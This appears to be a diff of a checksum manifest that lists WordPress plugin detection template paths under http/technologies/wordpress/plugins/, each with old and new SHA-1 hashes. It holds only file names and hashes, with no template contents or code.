-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 